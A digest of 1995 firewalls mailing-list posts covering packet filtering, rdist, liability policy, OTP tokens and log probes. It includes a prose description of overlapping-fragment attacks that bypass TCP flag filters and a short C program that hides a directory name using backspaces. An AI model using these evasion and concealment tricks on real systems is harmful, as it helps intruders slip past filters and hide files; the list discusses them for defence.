Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 2171
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Tom Fitzgerald, they said:
>
> avalon@coombs.anu.edu.au (Darren Reed) writes:
>
> >>> Somewhat luckily for filtering, in TCP and UDP packets the port numbers
> >>> are almost assured of being in the first fragment. The "established"
> >>> bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an
> >>> MTU of 28, successfully - I've done it.
>
> No argument, but RFC 791 says "Every internet module must be able to
> forward a datagram of 68 octets without further fragmentation", so it
> should always be safe to toss fragments smaller than that.
>

What about final fragments ? But then they won't have IP_MF set..

> > routines I've examined so far use the "hole-filling" paradigm (RFC815).
> > Had the one in the original RFC (791) been in common use, it would have
> > been a lot less cosy doing packet filtering :-/
>
> Hmmmm.... while you're right that RFC 791's reassembly algorithm is
> broken, I'm not sure that RFC 815 fixes it. Filtering breaks if data from
> one fragment is allowed to overwrite overlapping data from another fragment
> with a lower fragment-offset, and RFC 815 doesn't seem to prohibit this.
>
> The BSD/OS reassembly algorithm, for one, definitely does the right thing.
> It goes to some trouble to make sure that when fragments overlap, the
> fragment with the lower offset overwrites fragments with higher offset.
>
> If the reassembly algorithm was broken (like RFC 791's), it could be
> exploited by cooking up two overlapping fragments: one having a complete
> TCP header harmless enough to get through the firewall (for example ACK=1
> to get through an "established" filter), and the second fragment beginning
> in the middle of the TCP header, overwriting the flags to set ACK=0, to
> open a new connection inbound through the firewall. The second fragment
> would have offset>0, so the TCP filtering wouldn't be applied to it. This
> trick can't fake the source and destination port numbers, they're too close
> to the beginning of the TCP header, but it can fake anything else.

Bingo. 815 fills holes. A hole is where there is no data.

I should write this all up...:/

darren

From firewalls-owner Thu May 11 05:09:57 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA15234 for firewalls-outgoing; Thu, 11 May 1995 04:58:42 -0700
Received: from tserver.dsac.dla.mil (tserver.dsac.dla.mil [131.78.6.153]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA15229; Thu, 11 May 1995 04:58:38 -0700
Received: by tserver.dsac.dla.mil (5.65/1.35) id AA24927; Thu, 11 May 95 07:59:30 -0400
From: nto2584@tserver.dsac.dla.mil (Steven Payne)
Message-Id: <9505111159.AA24927@tserver.dsac.dla.mil>
Subject: Re: impossible vs. impractical
To: Brent@GreatCircle.COM (Brent Chapman)
Date: Thu, 11 May 1995 07:59:29 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Brent Chapman" at May 10, 95 01:12:01 pm
X-Mailer: ELM [version 2.4 PL21]
Content-Type: text
Content-Length: 1023
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> What the hell does this have to do with Firewalls? I STRONGLY object to
> people exporting flame wars from BugTraq to Firewalls. KNOCK IT OFF!
> > > -Brent STRONGLY AGREED, MUCH JUNK deleted for bandwidth's sake > > ---------------------------------------------------------------------- > For info about the Internet Security Firewalls Tutorial and a schedule > of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM > ---------------------------------------------------------------------- > Brent Chapman Great Circle Associates > Brent@GreatCircle.COM 1057 West Dana Street > +1 415 962 0841 Mountain View, CA 94041 > > Brent, I am planning on attending your tutorial in ann arbor this May 26. Do you recommend any extra reading other than "repelling the wiley hacker"? Also, do you go over specifics about products, what they do, and what they don't? Thanks steve payne spayne@dsac.dla.mil 614-692-9991 From firewalls-owner Thu May 11 06:10:04 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16112 for firewalls-outgoing; Thu, 11 May 1995 05:50:25 -0700 Received: from gateway1.DHL.COM (gateway1.DHL.COM [137.98.208.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA16107 for ; Thu, 11 May 1995 05:50:22 -0700 Received: from bruro1.bru-ro.DHL.COM by gateway1.DHL.COM id aa16939; 11 May 95 5:51 PDT Received: from pc-it30 (pc-it30.bru-ro.dhl.com) by bruro1.bru-ro.dhl.com with SMTP (DHLGMS 4.03-DSI) id AA079786655; Thu, 11 May 1995 14:50:55 +0200 Message-Id: <199505111250.AA079786655@bruro1.bru-ro.dhl.com> X-Sender: tjacquem@bru-ro.dhl.com (Unverified) X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 May 1995 14:50:50 +0200 To: Firewalls@greatcircle.com From: Thierry Jacquemart Subject: rdist issue Cc: tjacquem@bru-ro.DHL.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm having a problem using rdist through a firewall following the model "that which is not expressly permitted is prohibited" and implemented in a "Screened Host Gateway" configuration with TIS and Socks 
software on the bastion host.

As far as rdist is using remshd, and the primary stream source port is in the "privileged" range, and a secondary stream is opened with source and destination ports in the "privileged" range, how can I use it without opening a "hole" to the server which is on the internal network ? Does somebody know about a proxy ? Is there another and more secure (standard) application than rdist ?

Thanks for your help.
---------------
Thierry Jacquemart
DHL Worldwide Express
tjacquem@bru-ro.dhl.com

From firewalls-owner Thu May 11 06:45:25 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16631 for firewalls-outgoing; Thu, 11 May 1995 06:20:22 -0700
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA16626 for ; Thu, 11 May 1995 06:20:19 -0700
Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA02901; Thu, 11 May 1995 09:20:54 -0400
Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA18635; Thu, 11 May 1995 09:20:51 -0400
Message-Id: <9505111320.AA18635@wellspring.us.dg.com>
Comments: Authenticated sender is
From: "Jim Carroll"
Organization: Data General (Canada) Inc.
To: "Jason M. LeBlanc" , firewalls@greatcircle.com
Date: Thu, 11 May 1995 09:20:43 -0500
Subject: Re: Good all encompassing security guide
Reply-To: jcarroll@wellspring.us.dg.com
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.0-WB1)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 10 May 95 at 18:24, Jason M. LeBlanc was heard to utter:

> I know that's a misnomer...
> I need security info concerning the internet and NT servers, very new to
> the internet from a server standpoint, so don't beat me too hard.
> Something like 1. plug the thing in... 2. turn it on... 3. click on make me
> secure..., anything like that out there? Course not. But still looking...
If you want something easy, you're forgetting the most important step:

0. Hire an informed and experienced firewall guru to set the whole thing up.

Either that, or:

0. Spend lots of time on this list. Buy the C&B Firewalls book. Read it. Get involved in this list. Ask stupid questions. Learn. Snarf freeware tools. Experiment. Ask more questions. Feel confident? Good. Install a package. Turn it off. Unplug it. *Now* go to Step 1. ;)

--
Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ...
## If you like this sort of thing, ##
## this is the sort of thing you'll like. ##

From firewalls-owner Thu May 11 07:02:26 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16802 for firewalls-outgoing; Thu, 11 May 1995 06:28:07 -0700
Received: from nic.abii.com (nic.abii.com [204.77.143.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA16790 for ; Thu, 11 May 1995 06:28:02 -0700
Received: (from mail@localhost) by nic.abii.com (8.6.12/8.6.11) id IAA02680 for ; Thu, 11 May 1995 08:30:42 -0500
Received: from unknown(204.77.144.103) by nic.abii.com via smap (V1.3) id sma002678; Thu May 11 08:30:33 1995
Received: by mailserv.abii.com with Microsoft Mail id <2FB22C26@mailserv.abii.com>; Thu, 11 May 95 08:24:22 PDT
From: Garry Garrett
To: "'firewalls list from GreatCircle'"
Subject: RE: Liable for security
Date: Thu, 11 May 95 08:23:00 PDT
Message-ID: <2FB22C26@mailserv.abii.com>
Encoding: 67 TEXT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>What legal problems could a company incur if:
> 1. An employee posts offensive material?

I keep hearing that electronic material keeps getting thrown out of courts because you can't prove the offensive material came from the person whose userid sent it. Spoofing, or just plain forgetting to logout; it's just too easy for someone to fake being someone else for this kind of material to hold up in court.
Now that's what I hear, not that anyone ever quotes any sources or legal precedence. This also doesn't mean that you wouldn't get a computer illiterate judge/jury.

You need to write a policy about how user accounts are intended to be used and how they should not be used. Distribute this policy to all employees. This will minimize your risk, or at least give you an out by saying, "hey, this guy knew he was breaking company policy; it's not our fault".

You could go so far as to scan outgoing material (e-mail, usenet, etc.) for outgoing offensive material. You could even go so far as to kill outgoing material that was considered offensive. That would be expensive to make, smacks of censorship, etc. Do you bug your employees' phones, using voice recognition software to scan for offensive material? Do you open outgoing employee mail looking for offensive material? How do you define offensive material?

> 2. A cracker hid a trojan horse in materials the company
> distributes?

I have no expertise in this area, but my gut reaction is even if the materials your company distributes have enough language on the package (or the "do not break this seal before reading" seal that no one ever reads) to cover your butts, your real losses here are on your reputation (lost sales, shipping out clean copies of disks to all infected customers, having to throw in a nice freebie as an apology for having infected them in the first place, etc.) I think these are your real losses because if you market to businesses, they generally have virus protection software in place, and if you market to homes, they are less likely to throw together enough money to sue you anyway. (cheaper just to buy anti-virus software and never buy from you again.)

> 3. A cracker distributes copyrighted software from the
> company's server?
This is a legitimate concern, but if you document the security measures that you have put in place, they should be able to show that you have made a best effort to protect the copyright of the material on your server. This documentation will show that you have not been negligent or left your system open on purpose.

This brings up an interesting point: it is beneficial to software development firms (Borland, Microsoft, Lotus, etc.) to make sure that there is good security software that is easy to use and cheap or free (to make sure their own copyrights are protected). Who would be best suited to write this security software... would it be software development firms? :-) Just a thought.

Garry
Garry.Garrett@abii.com
I do not speak for my employer; I get into enough trouble speaking for myself.

From firewalls-owner Thu May 11 07:15:33 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17141 for firewalls-outgoing; Thu, 11 May 1995 06:47:04 -0700
Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA17136 for ; Thu, 11 May 1995 06:47:01 -0700
Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id IAA05587 for ; Thu, 11 May 1995 08:49:38 -0500
Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 011570000; 11 May 95 9:47 CDT
Received: from sctc.com by sccmailhost.sctc.com id 274210000; 11 May 95 9:47 CDT
Received: from abiquiu.sctc.com (abiquiu.sctc.com [172.17.192.98]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id IAA22683 for ; Thu, 11 May 1995 08:47:07 -0500
Received: (from nove@localhost) by abiquiu.sctc.com (8.6.12/8.6.9) id IAA21882; Thu, 11 May 1995 08:47:47 -0500
Date: Thu, 11 May 1995 08:47:47 -0500
From: Charles E Nove
Message-Id: <199505111347.IAA21882@abiquiu.sctc.com>
To: firewalls@greatcircle.com
Subject: Re: One Time Password Tokens
References:
<199505101938.AA21468@northshore.ecosoft.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Vin McLellan : >The Estimable Padgett opined: >>Recently two companies using challenge-response technology >>(Enigma-Logic and Secure Computing) have introduced the >>next logical step, software based tokens. >The user uses his PIN to get access to the secret key, which in turn is >used to encrypt a challenge from the server. In most challenge/ >response protocols (Enigma's, e.g.) the encrypted response to the >challenge is assumed to be evidence that the PIN was correct -- but the >server does not independently validate a user PIN. In fact, it never >sees it. I cannot speak for the Enigma-Logic product, but Secure Computing's LOCKout(tm) authentication product does in fact use the PIN in computing the response. The LOCKout "key" stored on the PC is combined with the user's PIN to create the encryption key that is used to encrypt the challenge. There is no way to determine the user's PIN by examining the data stored on the PC. A user's PIN can be changed, changing the key used to encrypt challenges, without modifying the stored "key". -- Chuck From firewalls-owner Thu May 11 07:39:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16980 for firewalls-outgoing; Thu, 11 May 1995 06:39:50 -0700 Received: from goggins.bath.ac.uk (goggins.bath.ac.uk [138.38.32.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA16959 for ; Thu, 11 May 1995 06:39:42 -0700 Received: from bath.ac.uk (actually host ss1.bath.ac.uk) by goggins.bath.ac.uk with SMTP (PP); Thu, 11 May 1995 14:35:57 +0100 To: Thierry Jacquemart CC: Firewalls@greatcircle.com Subject: Re: rdist issue In-reply-to: Your message of "Thu, 11 May 1995 14:50:50 +0200." 
<199505111250.AA079786655@bruro1.bru-ro.dhl.com>
Date: Thu, 11 May 1995 14:36:13 +0100
From: Icarus Sparry
Message-ID: <9505111436.aa17486@ss1.bath.ac.uk>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Use a more up-to-date version of rdist, which calls 'rsh' to do the work rather than using the library routine 'rcmd'. Mind you if you are trusting a BSD 'r' protocol, there is little need for a firewall :-)

Look in src.doc.ic.ac.uk:/computing/operating-systems/unix/rdist for a Europe mirror or usc.edu:/pub/rdist for the original.

From firewalls-owner Thu May 11 08:41:13 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA19605 for firewalls-outgoing; Thu, 11 May 1995 08:30:40 -0700
Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA19600 for ; Thu, 11 May 1995 08:30:37 -0700
Date: Thu, 11 May 1995 11:30:56 -0400
From: bret@real.com (Bret McDanel)
Received: by real.com (8.6.8.1/3.2.012693-Realistic Technologies Inc); id LAA27754 for firewalls@greatcircle.com; Thu, 11 May 1995 11:30:56 -0400
Message-Id: <199505111530.LAA27754@real.com>
To: firewalls@greatcircle.com
Subject: RE: Liable for security
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> You could go so far as to scan outgoing material (e-mail, usenet,
> etc.) for outgoing offensive material. You could even go so far
> as to kill outgoing material that was considered offensive. That
> would be expensive to make, smacks of censorship, etc. Do you bug
> your employees' phones, using voice recognition software to scan
> for offensive material? Do you open outgoing employee mail looking
> for offensive material? How do you define offensive material?
>

I think that the electronic privacy act of 1988 protects people in the US against searches of email that are going to or coming from an external network..
If this is true, then you'd be breaking the law by monitoring everything, and I know that you'd be breaking the law if you deleted the email (according to the EPA:1988 you cannot stop email in transit, the secret service got sued and lost because they did that to a bbs)

Now, because I know that people are dying to flame me over this I will restate only in the US.. Other countries may or may not have different laws..

From firewalls-owner Thu May 11 09:09:35 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA19691 for firewalls-outgoing; Thu, 11 May 1995 08:36:35 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA19686 for ; Thu, 11 May 1995 08:36:31 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA26568; Thu, 11 May 95 11:20:13 -0400
Date: Thu, 11 May 95 11:20:13 -0400
Message-Id: <9505111520.AA26568@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Liable for security
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

(Know that this is getting a bit off but there are some important points for those who just got handed the responsibility for "protection" without understanding *all* the implications. Experts and tech-only types may >nul)

> You need to write a policy about how user accounts are intended
> to be used and how they should not be used. Distribute this policy
> to all employees.

The problem is that unless enforced, a court will take a very dim view as will an employee-grievance board. Too many instances have been thrown out of court/board because the words were there but ignored by *everyone*. In some cases it can make your position worse because the indication is that the problem was known (hence the policy) but "due care" was lacking.
> This will minimize your risk, or at least
> give you an out by saying, "hey, this guy knew he was breaking
> company policy; it's not our fault".

Insufficient - from experience I can say that you need to show a consistent pattern of enforcement of the policy because the defense is certainly going to try to use non-enforcement against you (any real lawyers care to comment ?)

The very very important point I am trying to make is that the policy must be very carefully written to say not only what you are wanting done, but also that it will be enforced *equally and to everyone*. If you have a policy that says "no modems" and the Big Boss has one, consider yourself roadkill. If your policy says "no modems without approval from the vice president of tech ops" then you are covered - so long as you make sure that there is a form filled out and signed for the BB's modem.

"Never say Never" is a very good rule. "Waivers must be approved by..." is the way to write everything because there are always exceptions.

The sad fact is that you are going to have to pull the plug on someone, someday or you are not maintaining a real firewall. When (and not if) it happens you need to make sure that you are standing on a firm foundation with all exceptions covered or *you* are liable to become an exception.
Back to normal after the error in the Lorentz-FitzGerald equation,

Padgett

From firewalls-owner Thu May 11 09:30:41 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA19886 for firewalls-outgoing; Thu, 11 May 1995 08:45:47 -0700
Received: from edelweb.fr (edelweb.fr [193.51.12.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA19880 for ; Thu, 11 May 1995 08:45:42 -0700
Received: from champagne.edelweb.fr (champagne.edelweb.fr [193.51.12.33]) by edelweb.fr (8.6.10/8.6.9) with ESMTP id RAA19978 for ; Thu, 11 May 1995 17:46:10 +0200
Received: from localhost (touvet@localhost) by champagne.edelweb.fr (8.6.10/8.6.6) with SMTP id RAB12011 for ; Thu, 11 May 1995 17:46:10 +0200
Message-Id: <199505111546.RAB12011@champagne.edelweb.fr>
To: firewalls@greatcircle.com
Subject: Firewalls mailing list in French: interest !
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 11 May 1995 17:45:55 +0200
From: Jean-Christophe Touvet
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Folks,

I finally decided to create a French-speaking mailing list dedicated to Firewalls and Internet security. Many answers to my proposal were positive (19/25), and I thank all people who responded.

Below is the list's charter (translated here from the French original).

Cheers,

-JCT-

PS: also many thanks to Brent for majordomo

-------------------------------------------------------------------------------

Since I could not decide between the various names proposed for this list (coupe-feu, paroi anti-feu, garde-barriere etc.), I picked something that had not been suggested: "sas" (as in "sas de securite"). Here is the list's charter. I have added the suggestions I received, but of course none of this is final...

-------------------------------------------------------------------------------

Welcome to the list .
This list is intended for discussion of securing Internet access, mainly concerning "Firewall"-type solutions (sas de securite, coupe-feu or garde-barriere).

Here is a non-exhaustive list of the topics covered:

- architectures for secure Internet connections: which types for which needs?
- design/management/administration of security systems at the level of a network domain
- operating the TIS Firewall Toolkit (installation, improvements, utilities etc.)
- security problems specific to the Internet in French-speaking countries (encryption regulations, service providers' policies etc.)

The archives of this list are available in ASCII form at: and in hypertext form at:

The administrative address of the list is . To subscribe, simply write to that address with "subscribe sas" in the body of the message (not in the header), or "help" for more information on how majordomo works.
From firewalls-owner Thu May 11 09:39:43 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20268 for firewalls-outgoing; Thu, 11 May 1995 09:14:08 -0700 Received: from cs.columbia.edu (cs.columbia.edu [128.59.16.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA20262 for ; Thu, 11 May 1995 09:14:05 -0700 From: carson@cs.columbia.edu Received: from pizza.cs.columbia.edu (pizza.cs.columbia.edu [128.59.26.43]) by cs.columbia.edu (8.6.12/8.6.6) with ESMTP id MAA09118; Thu, 11 May 1995 12:14:44 -0400 Received: (from carson@localhost) by pizza.cs.columbia.edu (8.6.12/8.6.6) id MAA01231; Thu, 11 May 1995 12:13:22 -0400 Date: Thu, 11 May 1995 12:13:22 -0400 Message-Id: <199505111613.MAA01231@pizza.cs.columbia.edu> To: Icarus Sparry Cc: Thierry Jacquemart , Firewalls@GreatCircle.COM Subject: Re: rdist issue In-Reply-To: <9505111436.aa17486@ss1.bath.ac.uk> References: <199505111250.AA079786655@bruro1.bru-ro.dhl.com> <9505111436.aa17486@ss1.bath.ac.uk> Reply-To: carson@cs.columbia.edu Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are using the new berkeley rdist with krsh (kerberos rsh) as a more secure alternative. Since the transport is now separate, you can plug in any secure transport you wish (we use krsh, but the various secure telnets could be plugged in with a little effort). 
-- -- A Queen Trapped in a Butch Body is: Carson Gaspar -- carson@cs.columbia.edu, carson@lehman.com From firewalls-owner Thu May 11 10:14:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20304 for firewalls-outgoing; Thu, 11 May 1995 09:16:02 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA20299 for ; Thu, 11 May 1995 09:15:59 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s9aue-0000TfC; Thu, 11 May 95 09:16 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA24572; Thu, 11 May 1995 09:16:20 +0800 Date: Thu, 11 May 1995 09:16:20 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505111616.AA24572@brittany.oes.amdahl.com> To: firewalls@greatcircle.com, jpf@mig.com Subject: Re: A Probe? X-Sun-Charset: US-ASCII content-length: 1344 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Forgive me for my lapses... I have not subscribed to the list > for some time. However, I ran across the following sequence > in my log files and I thought some of you might have a few > ideas about the pattern. Does this appear to be an organized > probe? This is one of the few irregularities that I have not been > able to trace to routing flaps due to Internet restructuring. > Please reply directly to keep the S/N ratio low. ThankX. > > May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.71](2769->7) > May 10 20:54:11 gateway kernel: REJECT (IN): UDP [204.240.1.23]->[204.132.146.17](2715->7) ulen 13 on eth0 Can't imagine what they thought to accomplish with an echo. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. 
Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/

From firewalls-owner Thu May 11 10:19:02 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20985 for firewalls-outgoing; Thu, 11 May 1995 09:35:59 -0700
Received: from bootes.sds.no (bootes.sds.no [139.105.192.91]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA20941 for ; Thu, 11 May 1995 09:35:39 -0700
Received: by bootes.sds.no (5.65/DEC-Ultrix/4.3) id AA00307; Thu, 11 May 1995 18:36:09 +0200
Date: Thu, 11 May 1995 18:38:00 CST
From: toreh
Subject: Setting up firewalls as local news group
To: firewalls@greatcircle.com
Message-Id:
Priority: Normal
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This mailing list is getting to be too much for me (signal/noise ratio too LOW (I somehow got it upside down in a previous mail)). But part of my work is security, and if I cannot manage to read everything alone, I must find a way to share the information with four other people.

I am thinking about setting up a local firewalls news group, pipe the firewalls mailing list into this group, and use firewalls@greatcircle.com for moderator. Is this possible? Is this acceptable to the rest of the mailing list? If acceptable, how do I set it up (we use INN news software)? What are the pitfalls?

Any and all help appreciated!
--
tore

From firewalls-owner Thu May 11 10:33:24 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21011 for firewalls-outgoing; Thu, 11 May 1995 09:36:32 -0700
Received: from JASPER.MCCLELLAN.AF.MIL (jasper.mcclellan.af.mil [137.243.167.242]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21001 for ; Thu, 11 May 1995 09:36:27 -0700
From: mokbelsa@jasper.mcclellan.af.mil
Date: Thu, 11 May 1995 09:24:16 -2359
Message-Id: <95051109241611@jasper.mcclellan.af.mil>
To: firewalls@greatcircle.com
Subject: Digital's Firewall
X-VMS-To: SMTP%"firewalls@greatcircle.com"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all,

Has anybody worked with DEC's internet firewall system? If so:
- what do you think of it in terms of manageability, reliability, flexibility..?
- how easy is it to add new application proxies to it?
- any observations that you think are important?

You can Email me directly if you wish at: mokbelsa@jasper.mcclellan.af.mil

Thanks for any replies.
Sam Mokbel Network Consultant From firewalls-owner Thu May 11 10:40:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21049 for firewalls-outgoing; Thu, 11 May 1995 09:37:27 -0700 Received: from gateway1.DHL.COM (gateway1.DHL.COM [137.98.208.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21042 for ; Thu, 11 May 1995 09:37:23 -0700 Received: from bruro1.bru-ro.DHL.COM by gateway1.DHL.COM id aa29312; 11 May 95 9:38 PDT Received: from pc-it30 (pc-it30.bru-ro.dhl.com) by bruro1.bru-ro.dhl.com with SMTP (DHLGMS 4.03-DSI) id AA213930259; Thu, 11 May 1995 18:37:39 +0200 Message-Id: <199505111637.AA213930259@bruro1.bru-ro.dhl.com> X-Sender: tjacquem@bru-ro.dhl.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 May 1995 18:37:33 +0200 To: Firewalls@greatcircle.com From: Thierry Jacquemart Subject: Re: rdist issue Cc: ccsis@bath.ac.uk, tjacquem@bru-ro.DHL.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From : bath>ccsis >To : tjacquem >Subject : Re: rdist issue >Date : 11/05/95 15:47 >Use a more up-to-date version of rdist, which calls 'rsh' to do the >work rather than using the library routine 'rcmd'. I thought rsh was a command level interface to rcmd(). >Mind you if you are trusting a BSD 'r' protocol, there is little >need for a firewall :-) Well, this is not always the case. If you allow, let us say, inbound rlogin connections, and you control it with rlogin-gw (TIS), I think it's secure. This is why I'm asking for a rdist proxy. Can somebody help ? 
P.S.: the rdist server is on a HP-UX system ----------------- Thierry Jacquemart DHL Worldwide Express tjacquem@bru-ro.dhl.com From firewalls-owner Thu May 11 11:05:59 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20804 for firewalls-outgoing; Thu, 11 May 1995 09:33:40 -0700 Received: from cyclorama.engin.umich.edu (cyclorama.engin.umich.edu [141.212.66.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA20799 for ; Thu, 11 May 1995 09:33:37 -0700 Received: from localhost.engin.umich.edu (grue@localhost.engin.umich.edu [127.0.0.1]) by cyclorama.engin.umich.edu (8.6.12/8.6.4) with SMTP id MAA08998; Thu, 11 May 1995 12:32:40 -0400 Message-Id: <199505111632.MAA08998@cyclorama.engin.umich.edu> X-Authentication-Warning: cyclorama.engin.umich.edu: Host localhost.engin.umich.edu didn't use HELO protocol To: patrick@oes.amdahl.com (Patrick Horgan) cc: chris@sandpiper.com, firewalls@GreatCircle.COM Subject: Re: Help with begining options? In-reply-to: Your message of Mon, 08 May 1995 12:05:46 +0800. Date: Thu, 11 May 1995 12:32:39 -0400 From: Paul Howell Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Patrick Horgan writes: > [...deleted...] > Furthermore, it's often missed in a casual listing. The thing I was talking > about are directory names like " \b". This shows no clue. It could also > be something like, "hack\b\b\bdir\b\b" which would show as "hd" this is > almost impossible to deal with, unless you treat it as h*d*, but how would > you know to do that? 
>
> Here's a small program that illustrates it:
>
> #include <sys/types.h>
> #include <sys/stat.h>      /* mkdir() */
>
> int main(void)
> {
>     /* the backspaces make a terminal render this name as "hd" */
>     mkdir("my\b\bhack\b\b\bdir\b\b", 0777);
>     return 0;
> }
>
> Makefile        ipval.C         test*           testC.o
> add_tabs.c      math.C          test.cc         testREUSE.cc
> binout.cc       memsize.C       test.o          testc*
> date.C          hd/             test.sh*        testc.c
> hw1.1*          rmit.c          testC*          time.C
> hw1.1.cc        strang_proto.c  testC.cc        timers.C
>

Using the sysV version of ls (on a sun, /usr/5bin/ls)

% /usr/5bin/ls -b
a.c a.out my\010\010hack\010\010\010dir\010\010

This is after running your program. The 010 is the octal value of \b. This is how I get the names anyway.

< Paul

From firewalls-owner Thu May 11 11:07:59 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20885 for firewalls-outgoing; Thu, 11 May 1995 09:35:08 -0700
Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA20877 for ; Thu, 11 May 1995 09:35:05 -0700
Received: from elf.wang.com by tuna.wang.com with SMTP id AA12598 (5.67b/IDA-1.5 for ); Thu, 11 May 1995 12:35:26 -0400
Received: from fnord.wang.com by elf.wang.com with SMTP id AA11797 (5.67a/IDA-1.5); Thu, 11 May 1995 12:30:44 -0400
Received: by fnord.wang.com (5.67a/TF8) id AA23132; Thu, 11 May 1995 12:34:52 -0400
From: Tom Fitzgerald
Message-Id: <199505111634.AA23132@fnord.wang.com>
Subject: Re: IP packet filtering...
To: avalon@coombs.anu.edu.au (Darren Reed)
Date: Thu, 11 May 95 12:34:51 EDT
Cc: firewalls@greatcircle.com
In-Reply-To: <199505110959.AA04937@tuna.wang.com>; from "Darren Reed" at May 11, 95 8:00 pm
X-Mailer: ELM [version 2.3 PL11]
